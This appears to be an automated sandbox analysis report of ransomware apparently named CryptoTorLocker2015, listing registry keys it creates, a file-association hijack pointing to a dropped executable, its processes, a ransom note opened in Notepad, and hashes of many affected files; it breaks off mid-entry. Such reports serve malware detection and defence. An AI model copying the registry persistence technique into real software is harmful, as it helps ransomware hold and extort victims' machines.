Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.CryptoTorLocker2015! C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\DefaultIcon C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w8i9eHkHOwWwQlX.exe,0" C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\shell\open\command C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\shell\open C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w8i9eHkHOwWwQlX.exe" C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe

"C:\Users\Admin\AppData\Local\Temp\UNPACKED.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\HOW TO DECRYPT FILES.txt

Network

N/A

Files

C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\HOW TO DECRYPT FILES.txt

MD5 6468d057d7cb30ecd6283ea01e6ab5fd
SHA1 df5379d633e558544ebfcb88b6ad3f53e6df09b0
SHA256 a2ce2b6c9fc04d26e595e45849916efe01ceba18159013171ce44142830aeffe
SHA512 be080542f286df5cd9ff126dcba0057ef0ecf2d8b7767911035f419fc5e8dab4f1a055c04d07e4337af8fdebfae6a254337ab20ab0309eaa1696a1e14f87c10a

C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif

MD5 06837df93346f96cf67c02d0e5f56a21
SHA1 12effd49c886693c9d5a8f36f529896166428932
SHA256 90be465df45b4eb86ea75aa898ab375201ebde5fb2fadd8f4643f5060c7b1715
SHA512 2cf0baf215fc192ebe39c009a7ca4bd2d259af9eb4f7f42d209d8880fc7c005cbcc27163baaf2ab0d6783584ffd63e9ce8f49b3a0e422a6331a57ac50757b611

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt

MD5 67cc2591cd0966981c2d1d411b84ab1d
SHA1 e072c8275405370e43fedac40ea8256ba76cfcec
SHA256 3064bb8212089de899a8927835026dadfbd1829c08adf6ab246f3d266b4a04c1
SHA512 5711d607410853c6527be11eec48fd0d2a1500ebb0b4ae6cedd5617c00f2c15c7c7e150b9328db51596d851b1e3a0b07403a80890c5a51c13613271748d2cb0e

C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt

MD5 df2bcda9628e5a8f6256606660750cad
SHA1 11d18ed36d04e894f18a4f00e9d6314a754e9425
SHA256 9e129676838b8a4cedaad9dac0663d6a51b836bf2852801c837dc662915b8107
SHA512 2ba71c9bd38f731ea4a2fe3efeb194661c62d853b9dee4c9f24660069722635f1d2e0ce8620a9089a83d8f36bd27479f984b3515a3821aa52501baa1c47f9e02

C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt

MD5 e0810a82160a9a61674e219e23dab8f1
SHA1 c4778258a53c37f39eff0058e6e8bf0643a4d35e
SHA256 373cde86656ea29dace5ae73520e03b5219c07c6a7fe470f48f236134f9f2d30
SHA512 af2da00dbab75823e4f3707871c8062a5b883fbc2f73ef979b942128dbf195a4d943a5023ff1486fc012e3d67d9cb55e9c42f0ef000e842b47f27dd29d3e3521

C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF

MD5 06df8edd89154d68c49af15d65720af3
SHA1 be179da8a60543d3e0bd828be6a9bd3401ed2664
SHA256 103f9efbf111ee715ce67f81c3fbe566f93c1e71cec4bac7020ca0eab7c6cf1e
SHA512 b13a57147f34cfe6cc7728f80ea62e4cd31f734e4f9d5b7ae9d45f9e4e2e9704a93292342b0ec45bcde4e4796f74b53722a79ed31e5a8c00f1ac1edb28e0229d

C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF

MD5 85ebed08c41b43efbf4a4f555afa2d0e
SHA1 eed2e36357889c9295ba65b12aed733515eed6d7
SHA256 9ee38814debdd2d38f3c9f6363d5f7fa77f423bd33d76fd2a074a7fb6cb7a928
SHA512 15be03f2df3bdd6b2a0a355924b1024947e91615dea1be1309e791db18ce1c33a09173d348a6c14edd8db6784439927946d6b2c4377919105012b537fbfdbd1c

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\BG_ADOBE.GIF

MD5 4ef1096e556fbfc5fde3e1fa06304f73
SHA1 461f0c5affaf5efdb569e0e696579fc7c993050d
SHA256 b5648a7bc06ac614a32061c53f70c852df9f09d6c634a2494bb5e5d81d6216ba
SHA512 32c1db24fd9f823431c14935b2623262f100f33ed962dc1faca7c28cec7ba25eb8b31cd12da94f7763e212d50aa454ee2f389776c9b19f20b377dffb8ad35d80

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_VelvetRose.gif

MD5 50b93896736d7b1f45aaa17d64d8e73c
SHA1 bac863b6e98c4a73a4042a0110ebc81a7cfa41ab
SHA256 88abe1b6734cba5e42a6a2746673beb8a8e53f1029036bf4d3705bfeb7a66670
SHA512 37848c90e46a2b5c425b3d27e4aba046a580f3789d3723db0912b81a0e81527bc4719e1d45b880b010e9d942a54303199eb40eb5f5241265306634b5db3a0f40

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif

MD5 c4f38f4a65aad94cecdec9b0b3dc735a
SHA1 2937507381fcd367ef767d44589b8cd25599db1b
SHA256 42d7c219c08b92feb8e137bcfbab6d0ab51bf163e571a613cd6fa22abbe6d777
SHA512 73cd9f5576fb8ad65accbf5144ed7f60fbaf60fb2299caef10317cc7d21ac041610b8bd0dff902559cfdc886c03be893fff3b8a78cb11309dba5cc77fd9a223a

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_SlateBlue.gif

MD5 aee3f1890e967d09b48762e169dc9caa
SHA1 c9b41f9841b7e943f252551a8de2930e569b7698
SHA256 f97eb632aaf651e0c326eb3804165ed9fa77dbf0e47ddaef99f2b6bd12e7b275
SHA512 6af301f811dd3a6762f12627805e82121a348c510f6af22a180a9be841c3e499083be1716aea7acb78217d85faf5516d83511a4a6c79877456a20562bdb95082

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Premium.gif

MD5 e65a7bf78b818c4d661ee2c411cfc9ec
SHA1 22d21964b9ce666c0b0bcecf42b635ff695732a1
SHA256 446efb2650d61bcce3c1de99c83d3e85bccf9967b80908cd9fd40579552ab88f
SHA512 3903f1f67d3cad27c44140318abf3df1f4827f49f6c39da1bc4bd56ff1ec3cca401bad7b8a173f4e78979cfb3ea61f1d2e9dca206e116a223e7b9deaffe40a02

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_OliveGreen.gif

MD5 d262f8f5b77ddbdea33d04ad91525632
SHA1 c7206787efc2ba5ade7b24a38a48ff9c0d7f0057
SHA256 c47ad452ff99b20576c6c4baa0a4c4620181cfc668d66c487b3f70d5fee3c12b
SHA512 f027a6a81af7f02459285a33937f777090de33d36b075cc407c9ae2b5ba9587439de5d160134156368273f35ce155cbb380b3a80146796a8e3bbc11cf8f31c8c

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_LightSpirit.gif

MD5 11f4420064bd9c612e45770ead5c6cd6
SHA1 bdd3c907ab0e9b5863e2ea552499369987b28b0b
SHA256 31847c8af31e9f1775c56204275710ed642ae1ea55b8be38d1b82bec0d9d0d37
SHA512 f0a25fa5aeeb04f333e4adf7f21b38694e6b305192eb9a2897c6f505f1c63aaf2a09cb65cffd52f8181a627a4ba16828f5d03e063c4f2ba86b4dc5026a057e53

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Groove.gif

MD5 07370fcad2acfd6ad45e85548bdf2ea9
SHA1 d649a822dbc04308b827ef611bc994856c2c6b09
SHA256 d33de678a555b23d52c3665a3b2b455e5120c9670992dde7e21693a07dd1339d
SHA512 96dec13b7706fc8c43acb3b56d056950d322f5c4d56105a6be4011416f75c34169defd364bcbbbca2133ead6cf4cca3d535edacf173d3ca4fa764a24135759a7

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_GreenTea.gif

MD5 3f10bef3b41361e23f49bda84f4400c3
SHA1 8078027961aa7d96cef0a8713ac54156fae463e1
SHA256 59caa5c4066cb8d3c54140fb9db47db9123c7d0837f3544804fb4429b75314db
SHA512 9d152df2453d741ecb7aa34c53e0c4b8b424b19cf5b3010a1fe88110b90a87fbb4ffbc469fe47b0398214d60362f44590dabae3c98e174d649097a9f33db4e31

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif

MD5 414d995c962bdbd37a8a5df57c704973
SHA1 6d9d2d9c7bb60f32b3720a30d92957340791d473
SHA256 59806998e738b31094776810ed6122db03abf45153fe0f8c8663a7f54edeb32f
SHA512 49063e078b5e5730f95ae3ec203335e15787b5c8245e1d5132f6614d66d1b299b83d11a62156ff27a3d20a700e43a00d3afd7c6a13f7a55e22d0b628343bbe6a

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Country.gif

MD5 2aa0238eab9f40d5bc0085e061580fd5
SHA1 7737b425f04dd4ce9bf886b031eee19ec56bf41d
SHA256 b7c60fff09733bba301054964fed0f63cf71b8f0f603f8cbaf17a60ef8a61a8a
SHA512 6e125207fa57b4b8922ba2c5aa957088af161987b7764ffd6415eb26da5cd6b9657813b457a83c53364acb4dfd984c02ce0c6040326b78052b77816db65f25e6

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Casual.gif

MD5 78b05b567f3d91eedf537e28cc382a73
SHA1 56631473dc2ebaa4d98307b8966f102822f79f3d
SHA256 b046cef058bd43d6afa4c5d4eb1c563edb6c7dfee97dc25e77f3cfe25c888aab
SHA512 32aa999092d8d2a7cb67370f5c26ea3ca761611cbc841d49999cea3c0ec3ed91478eb1e3cae0bb5afb303931a5d59c09189eb85ef301a634d019d5a4ea79c2cc

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF

MD5 a3fcdcfe734d663c003ee6d2b4cc1c3b
SHA1 3f6297c831b3611f403a878cb39680403d33c603
SHA256 85746c8ae6da83216af31569503c86b1011055abbdabfc5a7c98ccca56626fea
SHA512 1cf3c313c446c16d2a3af3041bbac7a6be229b9dbb95c0b48ab2841e054fdf6da9432b87ffe4fc15e35d46a138ae3d3eb0e01e5aaa1ebe110404cc176460b616

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_OFF.GIF

MD5 110879749f7228ff0ed850cffd64b0d1
SHA1 ebafaf8a53fc98c7cdecff5e70890681102cfa78
SHA256 caa9b95b19cdad10bde5628a9613ab9d93b3943ac9a2a28d42eba1f2b2ee429f
SHA512 46c0379bbe55907ae3416ce188b5cf86982af4372e7f2ab4601ce731f4c3a111b0923e82f941186bcfcf04ed0cf0f78092d276b157484463a24c803c66901459

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\BUTTON.GIF

MD5 97596fb884501ca1680cdf19ad5418c9
SHA1 0017139a784fb05c7cbc2286492b233ce9dfb909
SHA256 64a56358c52fc799a001e3a565b1606795e3fd72a5364512ef23c6f168b3b284
SHA512 d4517e46db786e811c1ba8710464d379a9d6b70df7ab29bb78e1f9d366fc61bacc39991c2423194560bfca2a060a1b04c5b02dc25164e765a288f880c1d33da7

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\HEADER.GIF

MD5 4c69c0b9f117ae040c6c16e06ac1afb7
SHA1 4844368ca95d4f7adbf5a1f01b0e8d037ab3f39d
SHA256 8e425e4507452cd0799eabb419c39f516a1674b228389626ef4e9badb1d51497
SHA512 cb97e342d4bf9f917160b9d0c7e3c66f685e8dd09685a472e052d602455ce6aa5d49df82ad91519842e2b07c7ab121ab862f48bb33a4268bf65e4f307557602d

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageBlank.gif

MD5 0355f9afcdf5e2fdcc2cd7684221402f
SHA1 7746da91b7a9fb1ce14b9626e08b183e0a30c064
SHA256 a414577665e2c56535079a9b85bb6e52e72225e64cfbe1647f4f82e658753ae5
SHA512 69db12eb398351d5cbba494469f3c8be11d8fbbca1cdb26b064400532d59f118c56ae904cd51e3488992c27aebe307267690fceca5dff1560410eceab2657dd3

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif

MD5 a511bdf17358095494591f8d89c1cba0
SHA1 2109a6215c7a977bf8cfa8f7dc4b84e1e6970ff7
SHA256 8a3f4ba400b38c8b7d72573e4427c6b6523cb6d4dbd1e44ba654ad7c1cb9214f
SHA512 7438e9273496235d53b85967c01457699bd64c5237a250781e7b1550d29b7f3ead8275e29641960dcccfaf283ac294b5f960baf9b1c511b2e1e4ab21ab03b554

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp

MD5 00307c5fb3ed1ff4cb77d02709af2bb1
SHA1 1d7d4e097cdc915015ed67b56bbf1b08e94cc8b9
SHA256 9164bc45a2095376e0cad24bc592397bcb9f7f6467f1a90116633cdac5b1f6ea
SHA512 8f8f34fc01cb4eddc1c52209a722cea609d46136db2efb0c011d7e6c0c00d7f3d6b943f5f92598ac9441eb32862f57924e21f58ef5744cbef8f5667b91572664

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg

MD5 0be8122e76ea7bb9f76f64fb52241ba7
SHA1 ad86980bb0e8a9cdcfb53f35d5a42d3447312ac5
SHA256 e1a77275c763af1a236351f1049188341d3d92a730eb1914eca88e4be9c8c193
SHA512 9897be38f0b37a22c8811ad602c252400c966fc49206be9a3e9448c9f26464fecc8d989870b754ae56e3389a54dd8bff78cfb9e45b3a8e89af4c3a561d536ab1

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\background.gif

MD5 f85c835ba9c5223d4df2a663c14b25d5
SHA1 c872280ef6c868b863d6846a98dfa5094e35a41c
SHA256 0dd4f48edd4ffbf01263177343bbae522259cdffad61bc21b66c131c16376ea3
SHA512 42ed2b673588b49533bd72397791937b1913bcc84af549b3c7de697a854e94f16b366fb4720499eee19b3911af868ee9fb265b46c09aab9ba692d8f674958fcc

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_ON.GIF

MD5 35d0bed55b4e646415eb5bc05459b36e
SHA1 fddd4e3879857b638c2fb6f32af44ae7e64ebf99
SHA256 2beba5a928a0d465d702f6bdddbedc2bbd7c61ca885a08653d23c51810520577
SHA512 6eaafd46a939a46436d60b74b5bae7fda3bcac42847b48e60b0717501c524481b55e08dbad8cd98ef2a3cc9ce9a46c2b41ca4531f7bc9e890e7bf39fc7c36219

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_OFF.GIF

MD5 c7d1434ee4ef56ee5c80ce71311df3b9
SHA1 fb7ca26ee7b342031698802dd008d0ad84a3764c
SHA256 973cdbfa6d2fda416a934d8bf08e6c2a61b0709ba9f85f93b2777cf5a685de36
SHA512 9c09f0322ba5d82c6be860767add2fe8445a6fae86a6f05d93bdb42977747cb3523d7e555fc336373b196624aa8d951f30ecb021783591417ee7a39c900b5b5a

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF

MD5 601c8c0f6bfede21b01ed4344284095a
SHA1 1cd1848e970ecdfee35764d848a61bb5cbcf188d
SHA256 8d788af57c7b6fd639e519629b2a05bfe2581c11db61744b05a9c945abb86da7
SHA512 1da63b1e701e3a0b3366c58721e45ae666a45a25de34ca0414267fdcd4081fdec3949e07137422fa36f7ca4907a17ba5d1c31d7eaa75dc820b903c9f77a54542

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF

MD5 24a23f721835e21129f3e73de5d8395d
SHA1 a258e5a3b4d6238497a91c9f3e5d7de1ecf1ce82
SHA256 e5f1a43ed89ce695d6940b8db0f7424cb59660fe39bf6e018ee6447658d1a25b
SHA512 74cc65549104210768523acff171cedd705a0f3e3a304db2c334a8d8025ee7978f6f9f073037c730a43b93f33f8187ac9c854a90385295523e073c5e5c7f47b7

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF

MD5 0f7dcdb64958c58343336cd65da80a8f
SHA1 73db8500cae99d767fe8955127d1a02662e582a7
SHA256 e2d09bacfaa958eb4a6d90dc49abf96b8fd159d4a958c237703fed6bb4a2e53a
SHA512 5a4fd3d2a729d498853e7401c91e1b8d90cf5bd10d4c8128cb36f43ed5eca23ad4f5dce5594fc66400d7202e208fa2213c45bc0d9b2916ceec0ecd91021dc311

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_OFF.GIF

MD5 cb665ecfb83e74d2bc2df27cb64254f5
SHA1 7506b136ac4d6b13c83a16d55dfc0fab81f459d3
SHA256 ca798f18c844fb08e6bb0c808cbeaa815a56f176a6cdf0c622b68a16e96a14ec
SHA512 b3462700c30201e546b709d7eedf08644a10616cb9a235aff283da38983f53180ae4597b28703a8555fb52e0ddf34562667a70467127b612e60529882cf53222

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\HEADER.GIF

MD5 330c2d3957b6bbdb274668cc9263058b
SHA1 8ebbd5b06438d785849e74c9397a0a8bbcd43027
SHA256 ea037008037c7650e0afccf8c53baf133e5b801cd1197cf8238cac25614627bc
SHA512 668f5dce08b1cbe6d8b202b9e634fb0db75b4b12378ab4da21c95bf68d954a50c10288a01928ef8d6be5ad707334403049f0723126415e3e2e9fe213d9a957be

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF

MD5 e4d869711060bbfef18f42718fce3e31
SHA1 240979c151dff73c0d87358ae7ed4fac3fcbe9d3
SHA256 b5d6eecd24fec2abdd3f55449c7c94d779124fd4f185331e22c73ee29919c062
SHA512 17dd2b1004ff8e54abfde3d5cb8a42a80173deca697bcdc628f73db3717b4e56d6f3751a21b98442cbe4ca7c82a52be8f079c445d0804001d15fdfc5a2986827

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF

MD5 72d06fed69eed57661bae8c3bbfefd04
SHA1 d8599ddfc77ee9b9c051a5b002546817c22fc69e
SHA256 a5962a6b16f418a369e456371382cb2b08a6771d42cf1eae474cb8e64d2a6810
SHA512 56da9a579c7b0f8e260b959d9aba7a8cc9be79fa6b043ed2d5349b94264500108c16d91494c26bdb6696fcbf258cbc3fc8d66a2ea321ccc5426479cb34eec165

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\background.gif

MD5 2e9631742b55152f741fcdc5e3664c1d
SHA1 88bf82a74807f3ce9cd3d86bf4d175182a1695f5
SHA256 13615109b28319a104e9d540fbb7c985f14c6fa3c0b262890c80454ff82eed2a
SHA512 2439c3dcd21133485482b6df08e4582e70e1202c933484de458c786c8d677a5309939c7abc8f57b1d52a0a802249d540d9cd7aef5fdfd81cf007763792d97d84

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ADD.GIF

MD5 0573af8f669ac60864445130e2c96051
SHA1 d4ba91692736eed627206527fe2239a99db40817
SHA256 a024e6bfbb059d76b9431c3bdb0b2412de383f7301885e5fcfdd4762b312bd9e
SHA512 80dc941d215a4edbca7a6afa798c2361ee690cfbbf8dd4310f510d09259f04b66634fa0cdaf85946c002d68f1618e95acab78a393ff74447c36f540d9cf35bbb

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg

MD5 7f3561bd3eb3b1ee30e49001a0e3a49f
SHA1 d0c0cf0838b71723d505f741cd187db0550a5780
SHA256 1dff6485394ca5667c7512a36f4d4fd2ea9efa11b5f774f4ad85a2d9a3246e11
SHA512 9a2eb3398d72180c3554d77eb433ab1132d9c6896c7ecdb1ae3f2e3e2df281a91a1552e11b4a6289420ce13f114e94bda1da20241090cc02debe14ebc8ed1f33

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_underline.gif

MD5 7e048a9114a0f85728134ba9eacf2814
SHA1 8c39061dd59b692628e058e9ba233d8b5ccd5983
SHA256 0d2aab0ce4daaa2007957c181c5c32b0e96ad48c4be926816ce714f322f8fd07
SHA512 05a0c9e0213e77ebf90671aba894ac74e9cdf758313dc7defe6ff8dbc56927c5972f658430b8d26671708e7f6f69b17fbf1589a54bb40eaaf9269e7fc9bebfa6

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_italic.gif

MD5 698a4ce179742cab953ea3bca2412c30
SHA1 325b7c16532938d8b9286e8d9032911ce71a7f79
SHA256 4a204a0eacee1d54eeaca9fe5ef123a594f5918380a46eac9c976bee158052bd
SHA512 1fb6681bfa26c4e786e173561ad7dce2a25419aa2f57dd5a5b53b3206568df44935c378c87e43102bfb7e4832c68a5951ada698df630711bc3bea6a881337543

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosefont.gif

MD5 8872c401c1a741f01714c7cf617bbf1a
SHA1 0276f6f8dd460568fc3d35834535cda7dbf6ba63
SHA256 35f2ad5bc40328e0e54e8a28cdc9db9b5a7894cdf1605c084e108ad34a7cf2ef
SHA512 71cfcc3165d1931a399db085873439440f6ec71918a717359984c948dd0d769c2799adc9705bf1345d216ed38b62cc917580952036783f718759ad9d12e0a56d

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\RTF_BOLD.GIF

MD5 62d91a112536741cfa95fc82bb79c123
SHA1 ce4b05523b621bb159fe17e221c94f07ab66fa39
SHA256 41b657e8094580be04228f8b0fd66a7aa028250e7ee8b407189ddab16149488e
SHA512 a4f73ce203e316d34317cb2e003c34349bb8b2e2087467750d8e376b72679efb389473cb324699c225571c8f16688d4f708244f99fef214d7ced65fbebf95932

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg

MD5 e671f7d67f6c4242c187e673a7ba4b4d
SHA1 024b1bca6a8650805111789380babc2e6b84514b
SHA256 ad6c168f14426c50cfa40581e597f1ea4415ed83f4010c79ef31d0e030109037
SHA512 96ba50c21b6508af0ef56f2f4e49e23a7cc4cff54ff7a299afa557bcad70a4a764782cd559393b362898499e745cc8299368d3b41b137fe0a7cde8fd6cb2e141

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\HEADER.GIF

MD5 348b08106f2d11747d35009ffa4a302a
SHA1 ed1bbd38128a361b4f43f8520dd390aca0994116
SHA256 6951e417b74f21133940d769800b3d64ac2d90f5a827809f9f06208849a6c851
SHA512 885fac5c4f40711ee96063e36c0579026c17c0368539e7c25b07358bf36857c09917d60197543c9afd7f128c06cc2f5169afbc7aa51765b53891b97ba3e4da5f

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\background.gif

MD5 ba9eec5044c8570f7bf4780cdd9f3710
SHA1 238bad4b1c6a4ec381023ba5aa0d2bcfd82888e7
SHA256 8e0110d49fe7d17d37f43adf685644300e240e9d7fa9f6e1044d462710e8234b
SHA512 4ce8d2f85b9abf6ce7fb8704ff3b572658aa8dfc2c91c846bc600d03c74ab9b6e38e67b3e7b2fb26f011a1585942ae2170e89313fe75b8d404a94162d9aad278

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_ON.GIF

MD5 c5d679d9abf2a699dd621af3d5d9e217
SHA1 c0dbec0f4a42606a37125d167f33b3bcd6de84c5
SHA256 c1e95f9395bbde24f4ad0a54f57762cf6a7fba4624b0e2c8401454a16acaf4b3
SHA512 fcc3d89c9804d4110539020c3b478a837d95664e0001d03b6794c3e11e987cdd72a6639fd96d5842b92c8bd05d85ba63b4b764e08e8d9e08cce89384378ddd9b

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_OFF.GIF

MD5 1a4f0bd5cb939a9eec70c861f936d778
SHA1 e16903427a768abe86a87df09830ce29d8e8e74b
SHA256 4b577e3b8197fe504fed3e099ed24f95fdd141320e98d72e84205328c6efcd75
SHA512 e1f76e00cea2a153fb5ced6f02332dc3f9ef92067eb2ab73e388622a2c1a7c894ae64bd9f2aa3d1e010a442e17fe015096b5b78387161233d4109d75dcad487f

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\HEADER.GIF

MD5 55cab7182de4fd36efc7d4ce15d4fe1c
SHA1 7e88211f750a91f477a37a1fb3f0fcd7d56e1dbb
SHA256 c5103963ca79d2f435a123068ba47158a7e707d1d2697c3a6ab84ab6af532210
SHA512 94135fa5bba99c787dc6132cc63aa2bd5602a084f2d127f89fc3b1c971f3d80529e48569be349e070e68e8f138755448034faa3770cd07b190dc43d1bdec856c

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\background.gif

MD5 783f900cdbf4d3aaf8894fa783368dd8
SHA1 40331ea9aa7302b90d1515b438b514adfdc5d8f8
SHA256 d77b6c5cd6a20e9731016c7776dd86639e3d2b2f67d54a2dab0784c5c5d10e78
SHA512 11bd7e4ba37d4fdbba7c1693d1453da59ef6bf54b90c2a92a05b2aa9353a0b494e2298d47ff7173042a1cbbdae83b01307074c9b39c48c5940deccd7da790ab0

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif

MD5 2faf4026d11c512bf28c3ab14b57b0bd
SHA1 0c8a5d2ce008b92a88eb87d39e3364ac698ffffc
SHA256 8f32ccbee0f1b3c6255c9dbd0464081d52924281c7b8fecf0426d08b13107f97
SHA512 924d6c3d96cbe7e96d916f05adc4ae04b25941ec7b6022cdc304aeab10c1f30adc76ec3ee706cfe17968607df2ee17054b635209736f5e4d9b4c57ca0cd1ca60

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif

MD5 f24d95737e535d5bbb72168c479b9c35
SHA1 061a1a8475464581e62f0feb894e2377858d79c8
SHA256 271e4df641f1cabb33657f543c929d1a191d7ccf9a27ee4d15e27eac44c6b7e8
SHA512 f5960ab758c7952b5686a875f430db165f2c94ac0602a68c822e0276a0aa04a8dc21432e2535450910d9a372224d69ab712505d6eb9da88a20d9159adbe29b50

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_increaseindent.gif

MD5 fda667f798405c756c3b8ec49efd9f88
SHA1 e7230deb0d0d041e773a0dd314e7885a781d7875
SHA256 f8acc45e319f4a8b2bb53a60584bd532e886c1dd744d077e072b42475ca7758a
SHA512 704ed00051faa510d767fe3f6c386c511ed8ce8f1d8c4fa51e1c01815c545d9c1518a55f7d6730b5def1ab0c6b33faab880678848261452baf5ae0c50622e07f

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_decreaseindent.gif

MD5 0b0c2f589feb7074554034433a027179
SHA1 6dbe93ec5e2b22885fefbc4517b9310cc80de348
SHA256 21385b8f1297e4234f1ad530ac0318c4948d33e7ff433540b9d51f042e5e6018
SHA512 a305b7b5cc13a22b1c563ea623970118d4eb0c7ebccb453c2a303f7e666278151925de974777a047c14995d15f76eeca9709d68290c29ac5eeb975121b9a1cf9

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_center.gif

MD5 83862cb6f7f99055b15a6ecb369e6432
SHA1 96f25e347571a8bdd00ace4873927037af54e4ff
